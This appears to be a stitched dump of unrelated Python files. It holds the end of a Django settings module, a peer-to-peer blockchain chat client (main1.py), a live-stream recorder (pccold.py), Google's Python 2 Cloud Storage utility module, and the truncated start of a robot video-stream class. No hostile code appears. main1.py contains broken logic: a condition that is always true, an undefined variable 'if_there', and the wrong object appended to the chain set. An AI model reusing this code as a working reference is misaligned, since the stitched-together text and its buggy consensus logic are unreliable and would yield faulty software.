'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
main1.py
|
# run on your system
# new file
#test
import socket
import requests
import threading
import json
import datetime
import time
import netifaces as ni
import random
import pymongo
import hashlib
from blockchain import Blockchain
import sys
import _thread
ip = "http://192.168.43.168:5000"
page = "/ul"
login_p = '/logi'
logout_p = '/logout'
data = {
'num' : '1'
}
sport = 0
ssockets = []
chain_set=[]
lap = [12340,12341,12342,12344,12345,12346,12347]
user_count = len(lap)
message_queue=[]
# Login
def login(user):
d = {
'uname' : user
}
r = requests.post(url = ip+login_p, data = d)
return r.text
def logout():
print(threading.get_ident())
r = requests.post(url = ip+logout_p,data={'luname':myuname})
print('Successfully Logged out from server')
cclose()
print('Successfully Closed all sockets')
try:
_thread.interrupt_main()
except KeyboardInterrupt:
try:
_thread.interrupt_main()
except KeyboardInterrupt:
pass
pass
_thread.interrupt_main()
print('returning')
def get_active_users():
r = requests.post(url = ip+page, data = data)
user_list = r.text.split()
return user_list
def handle_transaction(msg):
send_all(blockchain.new_transaction(msg['sender'],msg['receiver'],msg['message'],msg['id'])[1])
def handle_randnum(msg):
blockchain.update_transactions(msg)
def handle_blockchain_request(blockchain_request):
# mybl=mydb.test.find({})
# bllt=[]
# for el in mybl:
# bllt.append(el)
bllt=blockchain.get_blockchain()
print(bllt)
a={'msg-type':'blockchain','blockchain':bllt}
send_msg(a,blockchain_request['sip'])
def handle_blockchain(received_blockchain):
global chain_set
received_blockchain=received_blockchain['blockchain']
chain_set.append(blockchain)
def handle_msg(msg):
print(threading.get_ident())
try:
if(msg['msg-type']=='transaction'):
handle_transaction(msg)
elif(msg['msg-type']=='random_number'):
handle_randnum(msg)
elif(msg['msg-type']=='blockchain_request'):
handle_blockchain_request(msg)
elif(msg['msg-type']=='blockchain'):
handle_blockchain(msg)
except Exception as e:
print(e)
def dl():
print('dl is created')
port=5001
sdl = socket.socket()
sdl.bind(('',port))
sdl.listen(5)
while(True):
c,addr = sdl.accept()
hval='hey'
hval=json.dumps(hval).encode('utf-8')
c.send(hval)
nt = json.loads(c.recv(1024).decode('utf-8'))
if 'logout' in nt.keys():
logout()
c.close()
_thread.interrupt_main()
return
else:
print(threading.get_ident())
print('received transaction from html')
temp=blockchain.new_transaction(nt['sender'],nt['receiver'],nt['message'])
send_all(temp[0])
send_all(temp[1])
c.close()
def socket_listen(soc, port):
print('listening on')
print(port)
soc.bind(('', port))
soc.listen()
while True:
c, addr = soc.accept()
val='connected'
val=json.dumps(val).encode('utf-8')
c.send(val)
msg = c.recv(1024)
msg=json.loads(msg.decode('utf-8'))
print('received')
print(msg)
val='received'
val=json.dumps(val).encode('utf-8')
c.send(val)
handle_msg(msg)
c.close()
def init():
global sport,me,myuname
myuname=sys.argv[1]
sport=int(login(myuname))
global ssockets
ssockets = [socket.socket(socket.AF_INET, socket.SOCK_STREAM) for _ in range(user_count)]
me = str(ni.ifaddresses('wlan0')[ni.AF_INET][0]['addr'])
print(me)
print('sport')
print(sport)
c1 = -1
for soc in ssockets:
c1 += 1
if(lap[c1] == sport):
continue
threading.Thread(target = socket_listen,args = (soc, lap[c1])).start()
threading.Thread(target=dl).start()
threading.Thread(target=b_send_msg).start()
global blockchain
blockchain = Blockchain(sys.argv[1])
threading.Thread(target=chek).start()
def send_msg(msg,sip):
global message_queue
message_queue.append([msg,sip])
def b_send_msg():
global message_queue
while(True):
if(len(message_queue)!=0):
m1=message_queue.pop(0)
a_send_msg(m1[0],m1[1])
def a_send_msg(msg,sip):
# if(msg=='close'):
# cclose()
# if(msg == 'logout'):
# logout()
soc = socket.socket()
# print('portszz')
# print(sip)
# print(sport)
soc.connect((sip,sport))
s1=json.loads(soc.recv(1024).decode('utf-8'))
msg=json.dumps(msg).encode('utf-8')
print('sending')
print(msg)
soc.send(msg)
rs=json.loads(soc.recv(1024).decode('utf-8'))
# print(rs)
soc.close()
return rs
def send_all(msg):
ul1=get_active_users()
rsl=[]
for us in ul1:
if(us != me):
print(us,me)
rsl.append(send_msg(msg,us))
return rsl
def cclose():
for s in ssockets:
s.close()
def get_majority_element(n_list):
fr=0
me=-1
for el in n_list:
if type(me)==type(el) and me==el:
fr=fr+1
else:
fr=fr-1
if fr==0 or -1:
me=el
fr=0
fl=False
for el in n_list:
if el==me:
fr=fr+1
if fr>len(n_list)/2:
fl=True
return me,fl
def validate_and_update(update_necessary=True):
global chain_set,me
print(me)
sm=blockchain.valid_chain()
if sm==False or update_necessary:
blockchain.update_state=True
# u1=mydb.test.find({})
# l1=[]
# for el in u1:
# l1.append(el)
chain_set.append(blockchain.get_blockchain())
print(chain_set)
send_all({'msg-type':'blockchain_request','sip':me})
nu=get_active_users()
blockchain.clear_blockchain()
blockchain.create_genesis_block()
while len(chain_set)!=nu:
pass
if len(chain_set)==1:
blockchain.update_state=False
return
maxl=[len(el) for el in chain_set]
maxl,is_there=get_majority_element(maxl)
if if_there==False:
maxl=min([len(el) for el in chain_set])
for el in range(1,maxl):
blockchain.insert_block(get_majority_element([el1[el] for el1 in chain_set])[0])
chain_set=[]
blockchain.update_state=False
def chek():
global blockchain
while True:
if len(blockchain.mineadd)!=0 and blockchain.update_state==False:
# sm=blockchain.valid_chain()
# print('valid chain')
# print(sm)
# if sm:
# temp=blockchain.mineadd.pop()
# blockchain.mine(temp)
# else:
# blockchain.update_chain()
validate_and_update(1)
temp=blockchain.mineadd.pop()
blockchain.mine(temp)
time.sleep(0.5)
init()
|
pccold.py
|
# coding: utf-8
"""
===================================================
__
_______ ______ ______ _____ | | ___
| __ || ___| | ___| / \ | | ___| |
| ___|| |____ | |____ | o || |_ | ___ |
|___| |_______||_______| \_____/ |____||_______|
===================================================
2018/10/5 by DKZ https://davidkingzyb.tech
"""
import json
import time
import subprocess
import threading
import logging
import sys
import os
import signal
import traceback
import re
import requests
from .tools import sendEmails,saveStream,testRoomStatus,pidpool,ReturnCodeObserverThread,SleepKillerThread
from .bypyrm import psCheck,initBypyRmEmail,bypyrm,doBypy
from .config import conf
is_live=False
#log set
logging.basicConfig(level=logging.INFO,
format='%(asctime)s [line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%m/%d %H:%M:%S',
filename=conf.log_path,
filemode='a')
# console = logging.StreamHandler()
# console.setLevel(logging.INFO)
# formatter = logging.Formatter('%(name)-12s: %(message)s')
# console.setFormatter(formatter)
# logging.getLogger('').addHandler(console)
def main():
global conf
try:
global is_live
room_obj=testRoomStatus()
logging.info('show_status:'+str(room_obj.get('show_status'))+' videoLoop:'+str(room_obj.get('videoLoop')))
if room_obj.get('show_status')==1 and room_obj.get('videoLoop')==0:
logging.info('live on')
if not is_live:
is_live=True
t=threading.Thread(target=sendEmails,args=(room_obj,))
t.start()
now_time=time.strftime('_%m_%d_%H_%M',time.localtime(time.time()))
room_name=room_obj.get('room_name','default')
room_name=re.sub(r"[\/\\\:\*\?\"\<\>\| \$\^\+\-\!]",'_',room_name)
saveStream(conf.stream_type,room_name+now_time+'.mp4',None)
elif room_obj.get('show_status')==2:
time.sleep(90)
tt=threading.Thread(target=main)
tt.start()
if is_live:
is_live=False
if conf.is_bypy:
shell=doBypy()
returncode=shell.wait()
logging.info('bypy returncode '+str(returncode))
if returncode==0 and conf.is_bypy_rm:
bypyrm()
else:
time.sleep(90)
tt=threading.Thread(target=main)
tt.start()
except Exception as e:
logging.warning('*** main fail')
logging.warning(e)
tb=traceback.format_exc()
logging.warning(tb)
pp=pidpool.copy()
for k,v in pp.items():
try:
os.killpg(os.getpgid(int(k)),signal.SIGKILL)
logging.info('main kill '+k)
except Exception as e:
logging.info('*** main kill err '+k)
time.sleep(60)
ttt=threading.Thread(target=main)
ttt.start()
ReturnCodeObserverThread.main=main
SleepKillerThread.main=main
if __name__ == '__main__':
logging.info('start pccold')
main()
|
gs_utils.py
|
#!/usr/bin/python
# pylint: disable=C0301
"""
Copyright 2014 Google Inc.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
Utilities for accessing Google Cloud Storage, using the boto library (wrapper
for the XML API).
API/library references:
- https://developers.google.com/storage/docs/reference-guide
- http://googlecloudstorage.blogspot.com/2012/09/google-cloud-storage-tutorial-using-boto.html
"""
# pylint: enable=C0301
# System-level imports
import errno
import hashlib
import math
import os
import posixpath
import Queue
import re
import sys
import threading
import time
# Imports from third-party code
TRUNK_DIRECTORY = os.path.abspath(os.path.join(
os.path.dirname(__file__), os.pardir, os.pardir))
for import_subdir in ['boto']:
import_dirpath = os.path.join(
TRUNK_DIRECTORY, 'third_party', 'externals', import_subdir)
if import_dirpath not in sys.path:
# We need to insert at the beginning of the path, to make sure that our
# imported versions are favored over others that might be in the path.
sys.path.insert(0, import_dirpath)
from boto.exception import BotoServerError
from boto.gs import acl
from boto.gs.bucket import Bucket
from boto.gs.connection import GSConnection
from boto.gs.key import Key
from boto.s3.bucketlistresultset import BucketListResultSet
from boto.s3.connection import SubdomainCallingFormat
from boto.s3.prefix import Prefix
# How many files to upload at once, by default.
# TODO(epoger): Is there a way to compute this intelligently? To some extent
# it is a function of how many cores are on the machine, and how many other
# processes it is running; but it's probably more a function of how much time
# each core sits idle waiting for network I/O to complete.
DEFAULT_UPLOAD_THREADS = 10
GS_PREFIX = 'gs://'
class AnonymousGSConnection(GSConnection):
"""GSConnection class that allows anonymous connections.
The GSConnection class constructor in
https://github.com/boto/boto/blob/develop/boto/gs/connection.py doesn't allow
for anonymous connections (connections without credentials), so we have to
override it.
"""
def __init__(self):
super(GSConnection, self).__init__(
# This is the important bit we need to add...
anon=True,
# ...and these are just copied in from GSConnection.__init__()
bucket_class=Bucket,
calling_format=SubdomainCallingFormat(),
host=GSConnection.DefaultHost,
provider='google')
class GSUtils(object):
"""Utilities for accessing Google Cloud Storage, using the boto library."""
class Permission:
"""Fine-grained permissions that may be set per user/group on each file.
See SupportedPermissions in
https://github.com/boto/boto/blob/develop/boto/gs/acl.py
Also see https://developers.google.com/storage/docs/accesscontrol
"""
EMPTY = None
OWNER = 'FULL_CONTROL'
READ = 'READ'
WRITE = 'WRITE'
class PredefinedACL:
"""Canned ACLs that provide a "base coat" of permissions for each file.
See CannedACLStrings in
https://github.com/boto/boto/blob/develop/boto/gs/acl.py
Also see https://developers.google.com/storage/docs/accesscontrol
"""
AUTHENTICATED_READ = 'authenticated-read'
BUCKET_OWNER_FULL_CONTROL = 'bucket-owner-full-control'
BUCKET_OWNER_READ = 'bucket-owner-read'
PRIVATE = 'private'
PROJECT_PRIVATE = 'project-private'
PUBLIC_READ = 'public-read'
PUBLIC_READ_WRITE = 'public-read-write'
class IdType:
"""Types of identifiers we can use to set "fine-grained" ACLs."""
GROUP_BY_DOMAIN = acl.GROUP_BY_DOMAIN
GROUP_BY_EMAIL = acl.GROUP_BY_EMAIL
GROUP_BY_ID = acl.GROUP_BY_ID
USER_BY_EMAIL = acl.USER_BY_EMAIL
USER_BY_ID = acl.USER_BY_ID
class UploadIf:
"""Cases in which we will upload a file.
Beware of performance tradeoffs. E.g., if you are uploading just one small
file, the extra round trip to check for file existence and/or checksum may
take longer than just uploading the file.
See http://skbug.com/2778 ('gs_utils: when uploading IF_NEW, batch up
checks for existing files within a single remote directory')
"""
ALWAYS = 1 # always upload the file
IF_NEW = 2 # if there is an existing file with the same name,
# leave it alone
IF_MODIFIED = 3 # if there is an existing file with the same name and
# contents, leave it alone
def __init__(self, boto_file_path=None):
"""Constructor.
Params:
boto_file_path: full path (local-OS-style) on local disk where .boto
credentials file can be found. If None, fall back on the
AWS_CREDENTIAL_FILE environment variable, then look in a set of
common paths for the .boto file. If no .boto file is found, then the
GSUtils object created will be able to access only public files in
Google Storage.
Raises an exception if no file is found at boto_file_path, or if the file
found there is malformed.
"""
self._gs_access_key_id = None
self._gs_secret_access_key = None
if not boto_file_path:
if os.environ.get('AWS_CREDENTIAL_FILE'):
boto_file_path = os.path.expanduser(os.environ['AWS_CREDENTIAL_FILE'])
if not boto_file_path:
for path in (os.path.join(os.path.expanduser('~'), '.boto'),):
if os.path.isfile(path):
boto_file_path = path
break
if boto_file_path:
print ('Reading boto file from %s' % boto_file_path)
boto_dict = _config_file_as_dict(filepath=boto_file_path)
self._gs_access_key_id = boto_dict['gs_access_key_id']
self._gs_secret_access_key = boto_dict['gs_secret_access_key']
else:
print >> sys.stderr, 'Warning: no .boto file found.'
# Which field we get/set in ACL entries, depending on IdType.
self._field_by_id_type = {
self.IdType.GROUP_BY_DOMAIN: 'domain',
self.IdType.GROUP_BY_EMAIL: 'email_address',
self.IdType.GROUP_BY_ID: 'id',
self.IdType.USER_BY_EMAIL: 'email_address',
self.IdType.USER_BY_ID: 'id',
}
def delete_file(self, bucket, path):
"""Delete a single file within a GS bucket.
TODO(epoger): what if bucket or path does not exist? Should probably raise
an exception. Implement, and add a test to exercise this.
Params:
bucket: GS bucket to delete a file from
path: full path (Posix-style) of the file within the bucket to delete
"""
b = self._connect_to_bucket(bucket=bucket)
key = Key(b)
key.name = path
try:
key.delete()
except BotoServerError, e:
e.body = (repr(e.body) +
' while deleting gs://%s/%s' % (b.name, path))
raise
def get_last_modified_time(self, bucket, path):
"""Gets the timestamp of when this file was last modified.
Params:
bucket: GS bucket in which to look for the file
path: full path (Posix-style) of the file within the bucket to check
Returns the last modified time, as a freeform string. If the file was not
found, returns None.
"""
b = self._connect_to_bucket(bucket=bucket)
try:
key = b.get_key(key_name=path)
if not key:
return None
return key.last_modified
except BotoServerError, e:
e.body = (repr(e.body) +
' while getting attributes of gs://%s/%s' % (b.name, path))
raise
def upload_file(self, source_path, dest_bucket, dest_path,
upload_if=UploadIf.ALWAYS,
predefined_acl=None,
fine_grained_acl_list=None):
"""Upload contents of a local file to Google Storage.
params:
source_path: full path (local-OS-style) on local disk to read from
dest_bucket: GS bucket to copy the file to
dest_path: full path (Posix-style) within that bucket
upload_if: one of the UploadIf values, describing in which cases we should
upload the file
predefined_acl: which predefined ACL to apply to the file on Google
Storage; must be one of the PredefinedACL values defined above.
If None, inherits dest_bucket's default object ACL.
fine_grained_acl_list: list of (id_type, id_value, permission) tuples
to apply to the uploaded file (on top of the predefined_acl),
or None if predefined_acl is sufficient
TODO(epoger): Consider adding a do_compress parameter that would compress
the file using gzip before upload, and add a "Content-Encoding:gzip" header
so that HTTP downloads of the file would be unzipped automatically.
See https://developers.google.com/storage/docs/gsutil/addlhelp/
WorkingWithObjectMetadata#content-encoding
"""
b = self._connect_to_bucket(bucket=dest_bucket)
local_md5 = None # filled in lazily
if upload_if == self.UploadIf.IF_NEW:
old_key = b.get_key(key_name=dest_path)
if old_key:
print ('Skipping upload of existing file gs://%s/%s' % (
b.name, dest_path))
return
elif upload_if == self.UploadIf.IF_MODIFIED:
old_key = b.get_key(key_name=dest_path)
if old_key:
if not local_md5:
local_md5 = _get_local_md5(path=source_path)
if ('"%s"' % local_md5) == old_key.etag:
print (
'Skipping upload of unmodified file gs://%s/%s : %s' % (
b.name, dest_path, local_md5))
return
elif upload_if != self.UploadIf.ALWAYS:
raise Exception('unknown value of upload_if: %s' % upload_if)
# Upload the file using a temporary name at first, in case the transfer
# is interrupted partway through.
if not local_md5:
local_md5 = _get_local_md5(path=source_path)
initial_key = Key(b)
initial_key.name = dest_path + '-uploading-' + local_md5
try:
initial_key.set_contents_from_filename(filename=source_path,
policy=predefined_acl)
except BotoServerError, e:
e.body = (repr(e.body) +
' while uploading source_path=%s to gs://%s/%s' % (
source_path, b.name, initial_key.name))
raise
# Verify that the file contents were uploaded successfully.
#
# TODO(epoger): Check whether the boto library or XML API already do this...
# if so, we may be duplicating effort here, and maybe we don't need to do
# the whole "upload using temporary filename, then rename" thing.
#
# TODO(epoger): Confirm that the etag is set on the server side...
# otherwise, we may just be validating another MD5 hash that was generated
# on the client side before the file was uploaded!
validate_key = b.get_key(key_name=initial_key.name)
if validate_key.etag != ('"%s"' % local_md5):
raise Exception('found wrong MD5 after uploading gs://%s/%s' % (
b.name, validate_key.name))
# Rename the file to its real name.
#
# TODO(epoger): I don't know how long this takes. I wish we could rename
# the key instead, but AFAICT you can't do that.
# Perhaps we could use Key.compose() to create a composite object pointing
# at the original key?
# See https://developers.google.com/storage/docs/composite-objects
final_key = b.copy_key(
new_key_name=dest_path, src_key_name=initial_key.name,
src_bucket_name=b.name, preserve_acl=False)
initial_key.delete()
# Set ACLs on the file.
# We do this *after* copy_key(), because copy_key's preserve_acl
# functionality would incur a performance hit.
for (id_type, id_value, permission) in fine_grained_acl_list or []:
self.set_acl(
bucket=b, path=final_key.name,
id_type=id_type, id_value=id_value, permission=permission)
def upload_dir_contents(self, source_dir, dest_bucket, dest_dir,
num_threads=DEFAULT_UPLOAD_THREADS,
upload_if=UploadIf.ALWAYS, **kwargs):
"""Recursively upload contents of a local directory to Google Storage.
params:
source_dir: full path (local-OS-style) on local disk of directory to copy
contents of
dest_bucket: GS bucket to copy the files into
dest_dir: full path (Posix-style) within that bucket; write the files into
this directory. If None, write into the root directory of the bucket.
num_threads: how many files to upload at once
upload_if: one of the UploadIf values, describing in which cases we should
upload the file
kwargs: any additional keyword arguments "inherited" from upload_file()
The copy operates as a merge: any files in source_dir will be "overlaid" on
top of the existing content in dest_dir. Existing files with the same names
may or may not be overwritten, depending on the value of upload_if.
TODO(epoger): Upload multiple files simultaneously to reduce latency.
"""
b = self._connect_to_bucket(bucket=dest_bucket)
if not dest_dir:
dest_dir = ''
# Create a set of all files within source_dir.
source_fileset = set()
prefix_length = len(source_dir)+1
for dirpath, _, filenames in os.walk(source_dir):
relative_dirpath = dirpath[prefix_length:]
for filename in filenames:
source_fileset.add(os.path.join(relative_dirpath, filename))
num_files_total = len(source_fileset)
# If we are only uploading files conditionally, remove any unnecessary
# files from source_fileset.
if upload_if == self.UploadIf.ALWAYS:
pass # there are no shortcuts... upload them all
else:
# Create a mapping of filename to Key for existing files within dest_dir
existing_dest_filemap = {}
prefix = dest_dir
if prefix and not prefix.endswith('/'):
prefix += '/'
prefix_length = len(prefix)
items = BucketListResultSet(bucket=b, prefix=prefix)
for item in items:
if type(item) is Key:
existing_dest_filemap[item.name[prefix_length:]] = item
# Now, depending on upload_if, trim files we should skip uploading.
files_in_common = source_fileset.intersection(
existing_dest_filemap.keys())
if upload_if == self.UploadIf.IF_NEW:
source_fileset -= files_in_common
elif upload_if == self.UploadIf.IF_MODIFIED:
for rel_path in files_in_common:
local_md5 = '"%s"' % _get_local_md5(path=os.path.join(
source_dir, rel_path))
key = existing_dest_filemap[rel_path]
if local_md5 == key.etag:
source_fileset.remove(rel_path)
else:
raise Exception('unknown value of upload_if: %s' % upload_if)
# Upload any files still in source_fileset.
num_files_to_upload = len(source_fileset)
print ('Uploading %d files, skipping %d ...' % (
num_files_to_upload, num_files_total - num_files_to_upload))
if num_files_to_upload == 0:
return
if num_threads > num_files_to_upload:
num_threads = num_files_to_upload
# Create a work queue with all files that need to be uploaded.
q = Queue.Queue(maxsize=num_files_to_upload)
for rel_path in source_fileset:
q.put(rel_path)
err = {}
# Spin up worker threads to read from the task queue.
def worker():
while True:
try:
rel_path = q.get(block=False)
except Queue.Empty:
return # no more tasks in the queue, so exit
print (' Uploading file %d/%d: %s' % (
num_files_to_upload - q.qsize(), num_files_to_upload, rel_path))
retries = 5
for retry in range(retries):
try:
self.upload_file(
source_path=os.path.join(source_dir, rel_path),
dest_bucket=b,
dest_path=posixpath.join(dest_dir, rel_path),
upload_if=self.UploadIf.ALWAYS,
**kwargs)
q.task_done()
break
except Exception as error:
if retry < retries - 1:
print ' Retrying upload, attempt #%d' % (retry + 1)
time.sleep(2 ** retry)
else:
err[rel_path] = error
for _ in range(num_threads):
t = threading.Thread(target=worker)
t.daemon = True
t.start()
# Block until all files have been uploaded and all workers have exited.
q.join()
if err:
errMsg = 'Failed to upload the following: \n\n'
for rel_path, e in err.iteritems():
errMsg += '%s: %s\n' % (rel_path, e)
raise Exception(errMsg)
def download_file(self, source_bucket, source_path, dest_path,
create_subdirs_if_needed=False, source_generation=None):
"""Downloads a single file from Google Cloud Storage to local disk.
Args:
source_bucket: GS bucket to download the file from
source_path: full path (Posix-style) within that bucket
dest_path: full path (local-OS-style) on local disk to copy the file to
create_subdirs_if_needed: boolean; whether to create subdirectories as
needed to create dest_path
source_generation: the generation version of the source
"""
b = self._connect_to_bucket(bucket=source_bucket)
key = Key(b)
key.name = source_path
if source_generation:
key.generation = source_generation
if create_subdirs_if_needed:
_makedirs_if_needed(os.path.dirname(dest_path))
with open(dest_path, 'w') as f:
try:
key.get_contents_to_file(fp=f)
except BotoServerError, e:
e.body = (repr(e.body) +
' while downloading gs://%s/%s to local_path=%s' % (
b.name, source_path, dest_path))
raise
def download_dir_contents(self, source_bucket, source_dir, dest_dir):
"""Recursively download contents of a Google Storage directory to local disk
params:
source_bucket: GS bucket to copy the files from
source_dir: full path (Posix-style) within that bucket; read the files
from this directory
dest_dir: full path (local-OS-style) on local disk of directory to copy
the files into
The copy operates as a "merge with overwrite": any files in source_dir will
be "overlaid" on top of the existing content in dest_dir. Existing files
with the same names will be overwritten.
TODO(epoger): Download multiple files simultaneously to reduce latency.
"""
_makedirs_if_needed(dest_dir)
b = self._connect_to_bucket(bucket=source_bucket)
(dirs, files) = self.list_bucket_contents(
bucket=source_bucket, subdir=source_dir)
for filename in files:
key = Key(b)
key.name = posixpath.join(source_dir, filename)
dest_path = os.path.join(dest_dir, filename)
with open(dest_path, 'w') as f:
try:
key.get_contents_to_file(fp=f)
except BotoServerError, e:
e.body = (repr(e.body) +
' while downloading gs://%s/%s to local_path=%s' % (
b.name, key.name, dest_path))
raise
for dirname in dirs:
self.download_dir_contents( # recurse
source_bucket=source_bucket,
source_dir=posixpath.join(source_dir, dirname),
dest_dir=os.path.join(dest_dir, dirname))
def get_acl(self, bucket, path, id_type, id_value):
"""Retrieve partial access permissions on a single file in Google Storage.
Various users who match this id_type/id_value pair may have access rights
other than that returned by this call, if they have been granted those
rights based on *other* id_types (e.g., perhaps they have group access
rights, beyond their individual access rights).
TODO(epoger): What if the remote file does not exist? This should probably
raise an exception in that case.
Params:
bucket: GS bucket
path: full path (Posix-style) to the file within that bucket
id_type: must be one of the IdType values defined above
id_value: get permissions for users whose id_type field contains this
value
Returns: the Permission value which has been set for users matching
this id_type/id_value, on this file; or Permission.EMPTY if no such
permissions have been set.
"""
field = self._field_by_id_type[id_type]
b = self._connect_to_bucket(bucket=bucket)
acls = b.get_acl(key_name=path)
matching_entries = [entry for entry in acls.entries.entry_list
if (entry.scope.type == id_type) and
(getattr(entry.scope, field) == id_value)]
if matching_entries:
assert len(matching_entries) == 1, '%d == 1' % len(matching_entries)
return matching_entries[0].permission
else:
return self.Permission.EMPTY
def set_acl(self, bucket, path, id_type, id_value, permission):
"""Set partial access permissions on a single file in Google Storage.
Note that a single set_acl() call will not guarantee what access rights any
given user will have on a given file, because permissions are additive.
(E.g., if you set READ permission for a group, but a member of that group
already has WRITE permission, that member will still have WRITE permission.)
TODO(epoger): Do we know that for sure? I *think* that's how it works...
If there is already a permission set on this file for this id_type/id_value
combination, this call will overwrite it.
TODO(epoger): What if the remote file does not exist? This should probably
raise an exception in that case.
Params:
bucket: GS bucket
path: full path (Posix-style) to the file within that bucket
id_type: must be one of the IdType values defined above
id_value: add permission for users whose id_type field contains this value
permission: permission to add for users matching id_type/id_value;
must be one of the Permission values defined above.
If Permission.EMPTY, then any permissions will be granted to this
particular id_type/id_value will be removed... but, given that
permissions are additive, specific users may still have access rights
based on permissions given to *other* id_type/id_value pairs.
Example Code:
bucket = 'gs://bucket-name'
path = 'path/to/file'
id_type = IdType.USER_BY_EMAIL
id_value = 'epoger@google.com'
set_acl(bucket, path, id_type, id_value, Permission.READ)
assert Permission.READ == get_acl(bucket, path, id_type, id_value)
set_acl(bucket, path, id_type, id_value, Permission.WRITE)
assert Permission.WRITE == get_acl(bucket, path, id_type, id_value)
"""
field = self._field_by_id_type[id_type]
b = self._connect_to_bucket(bucket=bucket)
acls = b.get_acl(key_name=path)
# Remove any existing entries that refer to the same id_type/id_value,
# because the API will fail if we try to set more than one.
matching_entries = [entry for entry in acls.entries.entry_list
if (entry.scope.type == id_type) and
(getattr(entry.scope, field) == id_value)]
if matching_entries:
assert len(matching_entries) == 1, '%d == 1' % len(matching_entries)
acls.entries.entry_list.remove(matching_entries[0])
# Add a new entry to the ACLs.
if permission != self.Permission.EMPTY:
args = {'type': id_type, 'permission': permission}
args[field] = id_value
new_entry = acl.Entry(**args)
acls.entries.entry_list.append(new_entry)
# Finally, write back the modified ACLs.
b.set_acl(acl_or_str=acls, key_name=path)
def list_bucket_contents(self, bucket, subdir=None):
"""Returns files in the Google Storage bucket as a (dirs, files) tuple.
TODO(epoger): This should raise an exception if subdir does not exist in
Google Storage; right now, it just returns empty contents.
Args:
bucket: name of the Google Storage bucket
subdir: directory within the bucket to list, or None for root directory
"""
# The GS command relies on the prefix (if any) ending with a slash.
prefix = subdir or ''
if prefix and not prefix.endswith('/'):
prefix += '/'
prefix_length = len(prefix) if prefix else 0
b = self._connect_to_bucket(bucket=bucket)
items = BucketListResultSet(bucket=b, prefix=prefix, delimiter='/')
dirs = []
files = []
for item in items:
t = type(item)
if t is Key:
files.append(item.name[prefix_length:])
elif t is Prefix:
dirs.append(item.name[prefix_length:-1])
return (dirs, files)
def does_storage_object_exist(self, bucket, object_name):
"""Determines whether an object exists in Google Storage.
Returns True if it exists else returns False.
"""
b = self._connect_to_bucket(bucket=bucket)
if object_name in b:
return True
dirs, files = self.list_bucket_contents(bucket, object_name)
return bool(dirs or files)
@staticmethod
def is_gs_url(url):
"""Returns True if url is a legal Google Storage URL ("gs://bucket/file").
"""
try:
if url.lower().startswith(GS_PREFIX) and len(url) > len(GS_PREFIX):
return url[len(GS_PREFIX)].isalnum()
else:
return False
except AttributeError:
return False
@staticmethod
def split_gs_url(url):
"""Returns (bucket, filepath) corresponding to a legal Google Storage URL.
Raises AttributeError if the input URL is not a legal Google Storage URL.
"""
if not GSUtils.is_gs_url(url):
raise AttributeError('"%s" is not a legal Google Storage URL' % url)
prefix_removed = url[len(GS_PREFIX):]
pathsep_index = prefix_removed.find('/')
if pathsep_index < 0:
return (prefix_removed, '')
else:
return (prefix_removed[:pathsep_index],
prefix_removed[pathsep_index+1:].strip('/'))
def _connect_to_bucket(self, bucket):
"""Returns a Bucket object we can use to access a particular bucket in GS.
Params:
bucket: name of the bucket (e.g., 'chromium-skia-gm'), or a Bucket
object (in which case this param is just returned as-is)
"""
if type(bucket) is Bucket:
return bucket
try:
return self._create_connection().get_bucket(bucket_name=bucket)
except BotoServerError, e:
e.body = repr(e.body) + ' while connecting to bucket=%s' % bucket
raise
def _create_connection(self):
"""Returns a GSConnection object we can use to access Google Storage."""
if self._gs_access_key_id:
return GSConnection(
gs_access_key_id=self._gs_access_key_id,
gs_secret_access_key=self._gs_secret_access_key)
else:
return AnonymousGSConnection()
def _config_file_as_dict(filepath):
"""Reads a boto-style config file into a dict.
Parses all lines from the file of this form: key = value
TODO(epoger): Create unittest.
Params:
filepath: path to config file on local disk
Returns: contents of the config file, as a dictionary
Raises exception if file not found.
"""
dic = {}
line_regex = re.compile('^\s*(\S+)\s*=\s*(\S+)\s*$')
with open(filepath) as f:
for line in f:
match = line_regex.match(line)
if match:
(key, value) = match.groups()
dic[key] = value
return dic
def _makedirs_if_needed(path):
"""Creates a directory (and any parent directories needed), if it does not
exist yet.
Args:
path: full path of directory to create
"""
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def _get_local_md5(path):
"""Returns the MD5 hash of a file on local disk."""
hasher = hashlib.md5()
with open(path, 'rb') as f:
while True:
data = f.read(64*1024)
if not data:
return hasher.hexdigest()
hasher.update(data)
|
robot_video_stream.py
|
"""
RobotVideoStream 中的部分代码 和 libh264decoder 来自 dji-sdk/RoboMaster-SDK
详见 https://github.com/dji-sdk/RoboMaster-SDK/tree/master/sample_code/RoboMasterEP/stream
"""
import queue
import socket
import threading
import time
import cv2
import numpy as np
from PIL import Image as PImage
import libh264decoder
from . import logger, robot_connection
from .decorators import retry
class RobotVideoStream(object):
